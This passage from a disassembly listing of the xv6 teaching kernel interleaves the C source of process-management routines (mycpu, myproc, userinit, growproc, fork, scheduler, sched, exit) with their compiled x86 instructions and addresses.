53 push %ebx static inline uint readeflags(void) { uint eflags; asm volatile("pushfl; popl %0" : "=r" (eflags)); 801036e5: 9c pushf 801036e6: 58 pop %eax int apicid, i; if(readeflags()&FL_IF) 801036e7: f6 c4 02 test $0x2,%ah 801036ea: 75 5b jne 80103747 <mycpu+0x67> panic("mycpu called with interrupts enabled\n"); apicid = lapicid(); 801036ec: e8 ff ef ff ff call 801026f0 <lapicid> // APIC IDs are not guaranteed to be contiguous. Maybe we should have // a reverse map, or reserve a register to store &cpus[i]. for (i = 0; i < ncpu; ++i) { 801036f1: 8b 35 20 2d 11 80 mov 0x80112d20,%esi 801036f7: 85 f6 test %esi,%esi 801036f9: 7e 3f jle 8010373a <mycpu+0x5a> if (cpus[i].apicid == apicid) 801036fb: 0f b6 15 a0 27 11 80 movzbl 0x801127a0,%edx 80103702: 39 d0 cmp %edx,%eax 80103704: 74 30 je 80103736 <mycpu+0x56> 80103706: b9 50 28 11 80 mov $0x80112850,%ecx 8010370b: 31 d2 xor %edx,%edx 8010370d: 8d 76 00 lea 0x0(%esi),%esi panic("mycpu called with interrupts enabled\n"); apicid = lapicid(); // APIC IDs are not guaranteed to be contiguous. Maybe we should have // a reverse map, or reserve a register to store &cpus[i]. for (i = 0; i < ncpu; ++i) { 80103710: 83 c2 01 add $0x1,%edx 80103713: 39 f2 cmp %esi,%edx 80103715: 74 23 je 8010373a <mycpu+0x5a> if (cpus[i].apicid == apicid) 80103717: 0f b6 19 movzbl (%ecx),%ebx 8010371a: 81 c1 b0 00 00 00 add $0xb0,%ecx 80103720: 39 d8 cmp %ebx,%eax 80103722: 75 ec jne 80103710 <mycpu+0x30> return &cpus[i]; 80103724: 69 c2 b0 00 00 00 imul $0xb0,%edx,%eax } panic("unknown apicid\n"); } 8010372a: 8d 65 f8 lea -0x8(%ebp),%esp 8010372d: 5b pop %ebx apicid = lapicid(); // APIC IDs are not guaranteed to be contiguous. Maybe we should have // a reverse map, or reserve a register to store &cpus[i]. for (i = 0; i < ncpu; ++i) { if (cpus[i].apicid == apicid) return &cpus[i]; 8010372e: 05 a0 27 11 80 add $0x801127a0,%eax } panic("unknown apicid\n"); } 80103733: 5e pop %esi 80103734: 5d pop %ebp 80103735: c3 ret panic("mycpu called with interrupts enabled\n"); apicid = lapicid(); // APIC IDs are not guaranteed to be contiguous. Maybe we should have // a reverse map, or reserve a register to store &cpus[i]. for (i = 0; i < ncpu; ++i) { 80103736: 31 d2 xor %edx,%edx 80103738: eb ea jmp 80103724 <mycpu+0x44> if (cpus[i].apicid == apicid) return &cpus[i]; } panic("unknown apicid\n"); 8010373a: 83 ec 0c sub $0xc,%esp 8010373d: 68 fc 76 10 80 push $0x801076fc 80103742: e8 29 cc ff ff call 80100370 <panic> mycpu(void) { int apicid, i; if(readeflags()&FL_IF) panic("mycpu called with interrupts enabled\n"); 80103747: 83 ec 0c sub $0xc,%esp 8010374a: 68 00 78 10 80 push $0x80107800 8010374f: e8 1c cc ff ff call 80100370 <panic> 80103754: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 8010375a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 80103760 <cpuid>: initlock(&ptable.lock, "ptable"); } // Must be called with interrupts disabled int cpuid() { 80103760: 55 push %ebp 80103761: 89 e5 mov %esp,%ebp 80103763: 83 ec 08 sub $0x8,%esp return mycpu()-cpus; 80103766: e8 75 ff ff ff call 801036e0 <mycpu> 8010376b: 2d a0 27 11 80 sub $0x801127a0,%eax } 80103770: c9 leave } // Must be called with interrupts disabled int cpuid() { return mycpu()-cpus; 80103771: c1 f8 04 sar $0x4,%eax 80103774: 69 c0 a3 8b 2e ba imul $0xba2e8ba3,%eax,%eax } 8010377a: c3 ret 8010377b: 90 nop 8010377c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80103780 <myproc>: } // Disable interrupts so that we are not rescheduled // while reading proc from the cpu structure struct proc* myproc(void) { 80103780: 55 push %ebp 80103781: 89 e5 mov %esp,%ebp 80103783: 53 push %ebx 80103784: 83 ec 04 sub $0x4,%esp struct cpu *c; struct proc *p; pushcli(); 80103787: e8 54 0d 00 00 call 801044e0 <pushcli> c = mycpu(); 8010378c: e8 4f ff ff ff call 801036e0 <mycpu> p = c->proc; 80103791: 8b 98 ac 00 00 00 mov 0xac(%eax),%ebx popcli(); 80103797: e8 34 0e 00 00 call 801045d0 <popcli> return p; } 8010379c: 83 c4 04 add $0x4,%esp 8010379f: 89 d8 mov %ebx,%eax 801037a1: 5b pop %ebx 801037a2: 5d pop %ebp 801037a3: c3 ret 801037a4: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 801037aa: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 801037b0 <userinit>: //PAGEBREAK: 32 // Set up first user process. void userinit(void) { 801037b0: 55 push %ebp 801037b1: 89 e5 mov %esp,%ebp 801037b3: 53 push %ebx 801037b4: 83 ec 04 sub $0x4,%esp struct proc *p; extern char _binary_initcode_start[], _binary_initcode_size[]; p = allocproc(); 801037b7: e8 f4 fd ff ff call 801035b0 <allocproc> 801037bc: 89 c3 mov %eax,%ebx initproc = p; 801037be: a3 bc a5 10 80 mov %eax,0x8010a5bc if((p->pgdir = setupkvm()) == 0) 801037c3: e8 28 37 00 00 call 80106ef0 <setupkvm> 801037c8: 85 c0 test %eax,%eax 801037ca: 89 43 04 mov %eax,0x4(%ebx) 801037cd: 0f 84 bd 00 00 00 je 80103890 <userinit+0xe0> panic("userinit: out of memory?"); inituvm(p->pgdir, _binary_initcode_start, (int)_binary_initcode_size); 801037d3: 83 ec 04 sub $0x4,%esp 801037d6: 68 2c 00 00 00 push $0x2c 801037db: 68 60 a4 10 80 push $0x8010a460 801037e0: 50 push %eax 801037e1: e8 ca 33 00 00 call 80106bb0 <inituvm> p->sz = PGSIZE; memset(p->tf, 0, sizeof(*p->tf)); 801037e6: 83 c4 0c add $0xc,%esp initproc = p; if((p->pgdir = setupkvm()) == 0) panic("userinit: out of memory?"); inituvm(p->pgdir, _binary_initcode_start, (int)_binary_initcode_size); p->sz = PGSIZE; 801037e9: c7 03 00 10 00 00 movl $0x1000,(%ebx) memset(p->tf, 0, sizeof(*p->tf)); 801037ef: 6a 4c push $0x4c 801037f1: 6a 00 push $0x0 801037f3: ff 73 18 pushl 0x18(%ebx) 801037f6: e8 95 0e 00 00 call 80104690 <memset> p->tf->cs = (SEG_UCODE << 3) | DPL_USER; 801037fb: 8b 43 18 mov 0x18(%ebx),%eax 801037fe: ba 1b 00 00 00 mov $0x1b,%edx p->tf->ds = (SEG_UDATA << 3) | DPL_USER; 80103803: b9 23 00 00 00 mov $0x23,%ecx p->tf->ss = p->tf->ds; p->tf->eflags = FL_IF; p->tf->esp = PGSIZE; p->tf->eip = 0; // beginning of initcode.S safestrcpy(p->name, "initcode", sizeof(p->name)); 80103808: 83 c4 0c add $0xc,%esp if((p->pgdir = setupkvm()) == 0) panic("userinit: out of memory?"); inituvm(p->pgdir, _binary_initcode_start, (int)_binary_initcode_size); p->sz = PGSIZE; memset(p->tf, 0, sizeof(*p->tf)); p->tf->cs = (SEG_UCODE << 3) | DPL_USER; 8010380b: 66 89 50 3c mov %dx,0x3c(%eax) p->tf->ds = (SEG_UDATA << 3) | DPL_USER; 8010380f: 8b 43 18 mov 0x18(%ebx),%eax 80103812: 66 89 48 2c mov %cx,0x2c(%eax) p->tf->es = p->tf->ds; 80103816: 8b 43 18 mov 0x18(%ebx),%eax 80103819: 0f b7 50 2c movzwl 0x2c(%eax),%edx 8010381d: 66 89 50 28 mov %dx,0x28(%eax) p->tf->ss = p->tf->ds; 80103821: 8b 43 18 mov 0x18(%ebx),%eax 80103824: 0f b7 50 2c movzwl 0x2c(%eax),%edx 80103828: 66 89 50 48 mov %dx,0x48(%eax) p->tf->eflags = FL_IF; 8010382c: 8b 43 18 mov 0x18(%ebx),%eax 8010382f: c7 40 40 00 02 00 00 movl $0x200,0x40(%eax) p->tf->esp = PGSIZE; 80103836: 8b 43 18 mov 0x18(%ebx),%eax 80103839: c7 40 44 00 10 00 00 movl $0x1000,0x44(%eax) p->tf->eip = 0; // beginning of initcode.S 80103840: 8b 43 18 mov 0x18(%ebx),%eax 80103843: c7 40 38 00 00 00 00 movl $0x0,0x38(%eax) safestrcpy(p->name, "initcode", sizeof(p->name)); 8010384a: 8d 43 6c lea 0x6c(%ebx),%eax 8010384d: 6a 10 push $0x10 8010384f: 68 25 77 10 80 push $0x80107725 80103854: 50 push %eax 80103855: e8 36 10 00 00 call 80104890 <safestrcpy> p->cwd = namei("/"); 8010385a: c7 04 24 2e 77 10 80 movl $0x8010772e,(%esp) 80103861: e8 5a e6 ff ff call 80101ec0 <namei> 80103866: 89 43 68 mov %eax,0x68(%ebx) // this assignment to p->state lets other cores // run this process. the acquire forces the above // writes to be visible, and the lock is also needed // because the assignment might not be atomic. acquire(&ptable.lock); 80103869: c7 04 24 40 35 11 80 movl $0x80113540,(%esp) 80103870: e8 ab 0c 00 00 call 80104520 <acquire> p->state = RUNNABLE; 80103875: c7 43 0c 03 00 00 00 movl $0x3,0xc(%ebx) release(&ptable.lock); 8010387c: c7 04 24 40 35 11 80 movl $0x80113540,(%esp) 80103883: e8 b8 0d 00 00 call 80104640 <release> } 80103888: 83 c4 10 add $0x10,%esp 8010388b: 8b 5d fc mov -0x4(%ebp),%ebx 8010388e: c9 leave 8010388f: c3 ret p = allocproc(); initproc = p; if((p->pgdir = setupkvm()) == 0) panic("userinit: out of memory?"); 80103890: 83 ec 0c sub $0xc,%esp 80103893: 68 0c 77 10 80 push $0x8010770c 80103898: e8 d3 ca ff ff call 80100370 <panic> 8010389d: 8d 76 00 lea 0x0(%esi),%esi 801038a0 <growproc>: // Grow current process's memory by n bytes. // Return 0 on success, -1 on failure. int growproc(int n) { 801038a0: 55 push %ebp 801038a1: 89 e5 mov %esp,%ebp 801038a3: 56 push %esi 801038a4: 53 push %ebx 801038a5: 8b 75 08 mov 0x8(%ebp),%esi // while reading proc from the cpu structure struct proc* myproc(void) { struct cpu *c; struct proc *p; pushcli(); 801038a8: e8 33 0c 00 00 call 801044e0 <pushcli> c = mycpu(); 801038ad: e8 2e fe ff ff call 801036e0 <mycpu> p = c->proc; 801038b2: 8b 98 ac 00 00 00 mov 0xac(%eax),%ebx popcli(); 801038b8: e8 13 0d 00 00 call 801045d0 <popcli> { uint sz; struct proc *curproc = myproc(); sz = curproc->sz; if(n > 0){ 801038bd: 83 fe 00 cmp $0x0,%esi growproc(int n) { uint sz; struct proc *curproc = myproc(); sz = curproc->sz; 801038c0: 8b 03 mov (%ebx),%eax if(n > 0){ 801038c2: 7e 34 jle 801038f8 <growproc+0x58> if((sz = allocuvm(curproc->pgdir, sz, sz + n)) == 0) 801038c4: 83 ec 04 sub $0x4,%esp 801038c7: 01 c6 add %eax,%esi 801038c9: 56 push %esi 801038ca: 50 push %eax 801038cb: ff 73 04 pushl 0x4(%ebx) 801038ce: e8 6d 34 00 00 call 80106d40 <allocuvm> 801038d3: 83 c4 10 add $0x10,%esp 801038d6: 85 c0 test %eax,%eax 801038d8: 74 36 je 80103910 <growproc+0x70> } else if(n < 0){ if((sz = deallocuvm(curproc->pgdir, sz, sz + n)) == 0) return -1; } curproc->sz = sz; switchuvm(curproc); 801038da: 83 ec 0c sub $0xc,%esp return -1; } else if(n < 0){ if((sz = deallocuvm(curproc->pgdir, sz, sz + n)) == 0) return -1; } curproc->sz = sz; 801038dd: 89 03 mov %eax,(%ebx) switchuvm(curproc); 801038df: 53 push %ebx 801038e0: e8 bb 31 00 00 call 80106aa0 <switchuvm> return 0; 801038e5: 83 c4 10 add $0x10,%esp 801038e8: 31 c0 xor %eax,%eax } 801038ea: 8d 65 f8 lea -0x8(%ebp),%esp 801038ed: 5b pop %ebx 801038ee: 5e pop %esi 801038ef: 5d pop %ebp 801038f0: c3 ret 801038f1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi sz = curproc->sz; if(n > 0){ if((sz = allocuvm(curproc->pgdir, sz, sz + n)) == 0) return -1; } else if(n < 0){ 801038f8: 74 e0 je 801038da <growproc+0x3a> if((sz = deallocuvm(curproc->pgdir, sz, sz + n)) == 0) 801038fa: 83 ec 04 sub $0x4,%esp 801038fd: 01 c6 add %eax,%esi 801038ff: 56 push %esi 80103900: 50 push %eax 80103901: ff 73 04 pushl 0x4(%ebx) 80103904: e8 37 35 00 00 call 80106e40 <deallocuvm> 80103909: 83 c4 10 add $0x10,%esp 8010390c: 85 c0 test %eax,%eax 8010390e: 75 ca jne 801038da <growproc+0x3a> struct proc *curproc = myproc(); sz = curproc->sz; if(n > 0){ if((sz = allocuvm(curproc->pgdir, sz, sz + n)) == 0) return -1; 80103910: b8 ff ff ff ff mov $0xffffffff,%eax 80103915: eb d3 jmp 801038ea <growproc+0x4a> 80103917: 89 f6 mov %esi,%esi 80103919: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80103920 <fork>: // Create a new process copying p as the parent. // Sets up stack to return as if from system call. // Caller must set state of returned proc to RUNNABLE. int fork(void) { 80103920: 55 push %ebp 80103921: 89 e5 mov %esp,%ebp 80103923: 57 push %edi 80103924: 56 push %esi 80103925: 53 push %ebx 80103926: 83 ec 1c sub $0x1c,%esp // while reading proc from the cpu structure struct proc* myproc(void) { struct cpu *c; struct proc *p; pushcli(); 80103929: e8 b2 0b 00 00 call 801044e0 <pushcli> c = mycpu(); 8010392e: e8 ad fd ff ff call 801036e0 <mycpu> p = c->proc; 80103933: 8b 98 ac 00 00 00 mov 0xac(%eax),%ebx popcli(); 80103939: e8 92 0c 00 00 call 801045d0 <popcli> int i, pid; struct proc *np; struct proc *curproc = myproc(); // Allocate process. if((np = allocproc()) == 0){ 8010393e: e8 6d fc ff ff call 801035b0 <allocproc> 80103943: 85 c0 test %eax,%eax 80103945: 89 c7 mov %eax,%edi 80103947: 89 45 e4 mov %eax,-0x1c(%ebp) 8010394a: 0f 84 b5 00 00 00 je 80103a05 <fork+0xe5> return -1; } // Copy process state from proc. if((np->pgdir = copyuvm(curproc->pgdir, curproc->sz)) == 0){ 80103950: 83 ec 08 sub $0x8,%esp 80103953: ff 33 pushl (%ebx) 80103955: ff 73 04 pushl 0x4(%ebx) 80103958: e8 63 36 00 00 call 80106fc0 <copyuvm> 8010395d: 83 c4 10 add $0x10,%esp 80103960: 85 c0 test %eax,%eax 80103962: 89 47 04 mov %eax,0x4(%edi) 80103965: 0f 84 a1 00 00 00 je 80103a0c <fork+0xec> kfree(np->kstack); np->kstack = 0; np->state = UNUSED; return -1; } np->sz = curproc->sz; 8010396b: 8b 03 mov (%ebx),%eax 8010396d: 8b 4d e4 mov -0x1c(%ebp),%ecx 80103970: 89 01 mov %eax,(%ecx) np->parent = curproc; 80103972: 89 59 14 mov %ebx,0x14(%ecx) *np->tf = *curproc->tf; 80103975: 89 c8 mov %ecx,%eax 80103977: 8b 79 18 mov 0x18(%ecx),%edi 8010397a: 8b 73 18 mov 0x18(%ebx),%esi 8010397d: b9 13 00 00 00 mov $0x13,%ecx 80103982: f3 a5 rep movsl %ds:(%esi),%es:(%edi) // Clear %eax so that fork returns 0 in the child. np->tf->eax = 0; for(i = 0; i < NOFILE; i++) 80103984: 31 f6 xor %esi,%esi np->sz = curproc->sz; np->parent = curproc; *np->tf = *curproc->tf; // Clear %eax so that fork returns 0 in the child. np->tf->eax = 0; 80103986: 8b 40 18 mov 0x18(%eax),%eax 80103989: c7 40 1c 00 00 00 00 movl $0x0,0x1c(%eax) for(i = 0; i < NOFILE; i++) if(curproc->ofile[i]) 80103990: 8b 44 b3 28 mov 0x28(%ebx,%esi,4),%eax 80103994: 85 c0 test %eax,%eax 80103996: 74 13 je 801039ab <fork+0x8b> np->ofile[i] = filedup(curproc->ofile[i]); 80103998: 83 ec 0c sub $0xc,%esp 8010399b: 50 push %eax 8010399c: e8 3f d4 ff ff call 80100de0 <filedup> 801039a1: 8b 55 e4 mov -0x1c(%ebp),%edx 801039a4: 83 c4 10 add $0x10,%esp 801039a7: 89 44 b2 28 mov %eax,0x28(%edx,%esi,4) *np->tf = *curproc->tf; // Clear %eax so that fork returns 0 in the child. np->tf->eax = 0; for(i = 0; i < NOFILE; i++) 801039ab: 83 c6 01 add $0x1,%esi 801039ae: 83 fe 10 cmp $0x10,%esi 801039b1: 75 dd jne 80103990 <fork+0x70> if(curproc->ofile[i]) np->ofile[i] = filedup(curproc->ofile[i]); np->cwd = idup(curproc->cwd); 801039b3: 83 ec 0c sub $0xc,%esp 801039b6: ff 73 68 pushl 0x68(%ebx) safestrcpy(np->name, curproc->name, sizeof(curproc->name)); 801039b9: 83 c3 6c add $0x6c,%ebx np->tf->eax = 0; for(i = 0; i < NOFILE; i++) if(curproc->ofile[i]) np->ofile[i] = filedup(curproc->ofile[i]); np->cwd = idup(curproc->cwd); 801039bc: e8 7f dc ff ff call 80101640 <idup> 801039c1: 8b 7d e4 mov -0x1c(%ebp),%edi safestrcpy(np->name, curproc->name, sizeof(curproc->name)); 801039c4: 83 c4 0c add $0xc,%esp np->tf->eax = 0; for(i = 0; i < NOFILE; i++) if(curproc->ofile[i]) np->ofile[i] = filedup(curproc->ofile[i]); np->cwd = idup(curproc->cwd); 801039c7: 89 47 68 mov %eax,0x68(%edi) safestrcpy(np->name, curproc->name, sizeof(curproc->name)); 801039ca: 8d 47 6c lea 0x6c(%edi),%eax 801039cd: 6a 10 push $0x10 801039cf: 53 push %ebx 801039d0: 50 push %eax 801039d1: e8 ba 0e 00 00 call 80104890 <safestrcpy> pid = np->pid; 801039d6: 8b 5f 10 mov 0x10(%edi),%ebx acquire(&ptable.lock); 801039d9: c7 04 24 40 35 11 80 movl $0x80113540,(%esp) 801039e0: e8 3b 0b 00 00 call 80104520 <acquire> np->state = RUNNABLE; 801039e5: c7 47 0c 03 00 00 00 movl $0x3,0xc(%edi) release(&ptable.lock); 801039ec: c7 04 24 40 35 11 80 movl $0x80113540,(%esp) 801039f3: e8 48 0c 00 00 call 80104640 <release> return pid; 801039f8: 83 c4 10 add $0x10,%esp 801039fb: 89 d8 mov %ebx,%eax } 801039fd: 8d 65 f4 lea -0xc(%ebp),%esp 80103a00: 5b pop %ebx 80103a01: 5e pop %esi 80103a02: 5f pop %edi 80103a03: 5d pop %ebp 80103a04: c3 ret struct proc *np; struct proc *curproc = myproc(); // Allocate process. if((np = allocproc()) == 0){ return -1; 80103a05: b8 ff ff ff ff mov $0xffffffff,%eax 80103a0a: eb f1 jmp 801039fd <fork+0xdd> } // Copy process state from proc. if((np->pgdir = copyuvm(curproc->pgdir, curproc->sz)) == 0){ kfree(np->kstack); 80103a0c: 8b 7d e4 mov -0x1c(%ebp),%edi 80103a0f: 83 ec 0c sub $0xc,%esp 80103a12: ff 77 08 pushl 0x8(%edi) 80103a15: e8 c6 e8 ff ff call 801022e0 <kfree> np->kstack = 0; 80103a1a: c7 47 08 00 00 00 00 movl $0x0,0x8(%edi) np->state = UNUSED; 80103a21: c7 47 0c 00 00 00 00 movl $0x0,0xc(%edi) return -1; 80103a28: 83 c4 10 add $0x10,%esp 80103a2b: b8 ff ff ff ff mov $0xffffffff,%eax 80103a30: eb cb jmp 801039fd <fork+0xdd> 80103a32: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80103a39: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80103a40 <scheduler>: // - swtch to start running that process // - eventually that process transfers control // via swtch back to the scheduler. void scheduler(void) { 80103a40: 55 push %ebp 80103a41: 89 e5 mov %esp,%ebp 80103a43: 57 push %edi 80103a44: 56 push %esi 80103a45: 53 push %ebx 80103a46: 83 ec 0c sub $0xc,%esp struct proc *p; struct cpu *c = mycpu(); 80103a49: e8 92 fc ff ff call 801036e0 <mycpu> 80103a4e: 8d 78 04 lea 0x4(%eax),%edi 80103a51: 89 c6 mov %eax,%esi c->proc = 0; 80103a53: c7 80 ac 00 00 00 00 movl $0x0,0xac(%eax) 80103a5a: 00 00 00 80103a5d: 8d 76 00 lea 0x0(%esi),%esi } static inline void sti(void) { asm volatile("sti"); 80103a60: fb sti for(;;){ // Enable interrupts on this processor. sti(); // Loop over process table looking for process to run. acquire(&ptable.lock); 80103a61: 83 ec 0c sub $0xc,%esp for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ 80103a64: bb 74 35 11 80 mov $0x80113574,%ebx for(;;){ // Enable interrupts on this processor. sti(); // Loop over process table looking for process to run. acquire(&ptable.lock); 80103a69: 68 40 35 11 80 push $0x80113540 80103a6e: e8 ad 0a 00 00 call 80104520 <acquire> 80103a73: 83 c4 10 add $0x10,%esp 80103a76: eb 13 jmp 80103a8b <scheduler+0x4b> 80103a78: 90 nop 80103a79: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ 80103a80: 83 c3 7c add $0x7c,%ebx 80103a83: 81 fb 74 54 11 80 cmp $0x80115474,%ebx 80103a89: 74 45 je 80103ad0 <scheduler+0x90> if(p->state != RUNNABLE) 80103a8b: 83 7b 0c 03 cmpl $0x3,0xc(%ebx) 80103a8f: 75 ef jne 80103a80 <scheduler+0x40> // Switch to chosen process. It is the process's job // to release ptable.lock and then reacquire it // before jumping back to us. c->proc = p; switchuvm(p); 80103a91: 83 ec 0c sub $0xc,%esp continue; // Switch to chosen process. It is the process's job // to release ptable.lock and then reacquire it // before jumping back to us. c->proc = p; 80103a94: 89 9e ac 00 00 00 mov %ebx,0xac(%esi) switchuvm(p); 80103a9a: 53 push %ebx // Enable interrupts on this processor. sti(); // Loop over process table looking for process to run. acquire(&ptable.lock); for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ 80103a9b: 83 c3 7c add $0x7c,%ebx // Switch to chosen process. It is the process's job // to release ptable.lock and then reacquire it // before jumping back to us. c->proc = p; switchuvm(p); 80103a9e: e8 fd 2f 00 00 call 80106aa0 <switchuvm> p->state = RUNNING; swtch(&(c->scheduler), p->context); 80103aa3: 58 pop %eax 80103aa4: 5a pop %edx 80103aa5: ff 73 a0 pushl -0x60(%ebx) 80103aa8: 57 push %edi // Switch to chosen process. It is the process's job // to release ptable.lock and then reacquire it // before jumping back to us. c->proc = p; switchuvm(p); p->state = RUNNING; 80103aa9: c7 43 90 04 00 00 00 movl $0x4,-0x70(%ebx) swtch(&(c->scheduler), p->context); 80103ab0: e8 36 0e 00 00 call 801048eb <swtch> switchkvm(); 80103ab5: e8 c6 2f 00 00 call 80106a80 <switchkvm> // Process is done running for now. // It should have changed its p->state before coming back. c->proc = 0; 80103aba: 83 c4 10 add $0x10,%esp // Enable interrupts on this processor. sti(); // Loop over process table looking for process to run. acquire(&ptable.lock); for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ 80103abd: 81 fb 74 54 11 80 cmp $0x80115474,%ebx swtch(&(c->scheduler), p->context); switchkvm(); // Process is done running for now. // It should have changed its p->state before coming back. c->proc = 0; 80103ac3: c7 86 ac 00 00 00 00 movl $0x0,0xac(%esi) 80103aca: 00 00 00 // Enable interrupts on this processor. sti(); // Loop over process table looking for process to run. acquire(&ptable.lock); for(p = ptable.proc; p < &ptable.proc[NPROC]; p++){ 80103acd: 75 bc jne 80103a8b <scheduler+0x4b> 80103acf: 90 nop // Process is done running for now. // It should have changed its p->state before coming back. c->proc = 0; } release(&ptable.lock); 80103ad0: 83 ec 0c sub $0xc,%esp 80103ad3: 68 40 35 11 80 push $0x80113540 80103ad8: e8 63 0b 00 00 call 80104640 <release> } 80103add: 83 c4 10 add $0x10,%esp 80103ae0: e9 7b ff ff ff jmp 80103a60 <scheduler+0x20> 80103ae5: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80103ae9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80103af0 <sched>: // be proc->intena and proc->ncli, but that would // break in the few places where a lock is held but // there's no process. void sched(void) { 80103af0: 55 push %ebp 80103af1: 89 e5 mov %esp,%ebp 80103af3: 56 push %esi 80103af4: 53 push %ebx // while reading proc from the cpu structure struct proc* myproc(void) { struct cpu *c; struct proc *p; pushcli(); 80103af5: e8 e6 09 00 00 call 801044e0 <pushcli> c = mycpu(); 80103afa: e8 e1 fb ff ff call 801036e0 <mycpu> p = c->proc; 80103aff: 8b 98 ac 00 00 00 mov 0xac(%eax),%ebx popcli(); 80103b05: e8 c6 0a 00 00 call 801045d0 <popcli> sched(void) { int intena; struct proc *p = myproc(); if(!holding(&ptable.lock)) 80103b0a: 83 ec 0c sub $0xc,%esp 80103b0d: 68 40 35 11 80 push $0x80113540 80103b12: e8 89 09 00 00 call 801044a0 <holding> 80103b17: 83 c4 10 add $0x10,%esp 80103b1a: 85 c0 test %eax,%eax 80103b1c: 74 4f je 80103b6d <sched+0x7d> panic("sched ptable.lock"); if(mycpu()->ncli != 1) 80103b1e: e8 bd fb ff ff call 801036e0 <mycpu> 80103b23: 83 b8 a4 00 00 00 01 cmpl $0x1,0xa4(%eax) 80103b2a: 75 68 jne 80103b94 <sched+0xa4> panic("sched locks"); if(p->state == RUNNING) 80103b2c: 83 7b 0c 04 cmpl $0x4,0xc(%ebx) 80103b30: 74 55 je 80103b87 <sched+0x97> static inline uint readeflags(void) { uint eflags; asm volatile("pushfl; popl %0" : "=r" (eflags)); 80103b32: 9c pushf 80103b33: 58 pop %eax panic("sched running"); if(readeflags()&FL_IF) 80103b34: f6 c4 02 test $0x2,%ah 80103b37: 75 41 jne 80103b7a <sched+0x8a> panic("sched interruptible"); intena = mycpu()->intena; 80103b39: e8 a2 fb ff ff call 801036e0 <mycpu> swtch(&p->context, mycpu()->scheduler); 80103b3e: 83 c3 1c add $0x1c,%ebx panic("sched locks"); if(p->state == RUNNING) panic("sched running"); if(readeflags()&FL_IF) panic("sched interruptible"); intena = mycpu()->intena; 80103b41: 8b b0 a8 00 00 00 mov 0xa8(%eax),%esi swtch(&p->context, mycpu()->scheduler); 80103b47: e8 94 fb ff ff call 801036e0 <mycpu> 80103b4c: 83 ec 08 sub $0x8,%esp 80103b4f: ff 70 04 pushl 0x4(%eax) 80103b52: 53 push %ebx 80103b53: e8 93 0d 00 00 call 801048eb <swtch> mycpu()->intena = intena; 80103b58: e8 83 fb ff ff call 801036e0 <mycpu> } 80103b5d: 83 c4 10 add $0x10,%esp panic("sched running"); if(readeflags()&FL_IF) panic("sched interruptible"); intena = mycpu()->intena; swtch(&p->context, mycpu()->scheduler); mycpu()->intena = intena; 80103b60: 89 b0 a8 00 00 00 mov %esi,0xa8(%eax) } 80103b66: 8d 65 f8 lea -0x8(%ebp),%esp 80103b69: 5b pop %ebx 80103b6a: 5e pop %esi 80103b6b: 5d pop %ebp 80103b6c: c3 ret { int intena; struct proc *p = myproc(); if(!holding(&ptable.lock)) panic("sched ptable.lock"); 80103b6d: 83 ec 0c sub $0xc,%esp 80103b70: 68 30 77 10 80 push $0x80107730 80103b75: e8 f6 c7 ff ff call 80100370 <panic> if(mycpu()->ncli != 1) panic("sched locks"); if(p->state == RUNNING) panic("sched running"); if(readeflags()&FL_IF) panic("sched interruptible"); 80103b7a: 83 ec 0c sub $0xc,%esp 80103b7d: 68 5c 77 10 80 push $0x8010775c 80103b82: e8 e9 c7 ff ff call 80100370 <panic> if(!holding(&ptable.lock)) panic("sched ptable.lock"); if(mycpu()->ncli != 1) panic("sched locks"); if(p->state == RUNNING) panic("sched running"); 80103b87: 83 ec 0c sub $0xc,%esp 80103b8a: 68 4e 77 10 80 push $0x8010774e 80103b8f: e8 dc c7 ff ff call 80100370 <panic> struct proc *p = myproc(); if(!holding(&ptable.lock)) panic("sched ptable.lock"); if(mycpu()->ncli != 1) panic("sched locks"); 80103b94: 83 ec 0c sub $0xc,%esp 80103b97: 68 42 77 10 80 push $0x80107742 80103b9c: e8 cf c7 ff ff call 80100370 <panic> 80103ba1: eb 0d jmp 80103bb0 <exit> 80103ba3: 90 nop 80103ba4: 90 nop 80103ba5: 90 nop 80103ba6: 90 nop 80103ba7: 90 nop 80103ba8: 90 nop 80103ba9: 90 nop 80103baa: 90 nop 80103bab: 90 nop 80103bac: 90 nop 80103bad: 90 nop 80103bae: 90 nop 80103baf: 90 nop 80103bb0 <exit>: // Exit the current process. Does not return. // An exited process remains in the zombie state // until its parent calls wait() to find out it exited. void exit(void) { 80103bb0: 55 push %ebp 80103bb1: 89 e5 mov %esp,%ebp 80103bb3: 57 push %edi 80103bb4: 56 push %esi 80103bb5: 53 push %ebx 80103bb6: 83 ec 0c sub $0xc,%esp // while reading proc from the cpu structure struct proc* myproc(void) { struct cpu *c; struct proc *p; pushcli(); 80103bb9: e8 22 09 00 00 call 801044e0 <pushcli> c = mycpu(); 80103bbe: e8 1d fb ff ff call 801036e0 <mycpu> p = c->proc; 80103bc3: 8b b0 ac 00 00 00 mov 0xac(%eax),%esi popcli(); 80103bc9: e8 02 0a 00 00 call 801045d0 <popcli> { struct proc *curproc = myproc(); struct proc *p; int fd; if(curproc == initproc) 80103bce: 39 35 bc a5 10 80 cmp %esi,0x8010a5bc 80103bd4: 8d 5e 28 lea 0x28(%esi),%ebx 80103bd7: 8d 7e 68 lea 0x68(%esi),%edi 80103bda: 0f 84 e7 00 00 00 je 80103cc7 <exit+0x117> panic("init exiting"); // Close all open files. for(fd = 0; fd < NOFILE; fd++){ if(curproc->ofile[fd]){ 80103be0: 8b 03 mov (%ebx),%eax 80103be2: 85 c0 test %eax,%eax 80103be4: 74 12 je 80103bf8 <exit+0x48> fileclose(curproc->ofile[fd]); 80103be6: 83 ec 0c sub $0xc,%esp 80103be9: 50 push %eax 80103bea: e8 41 d2 ff ff call 80100e30 <fileclose> 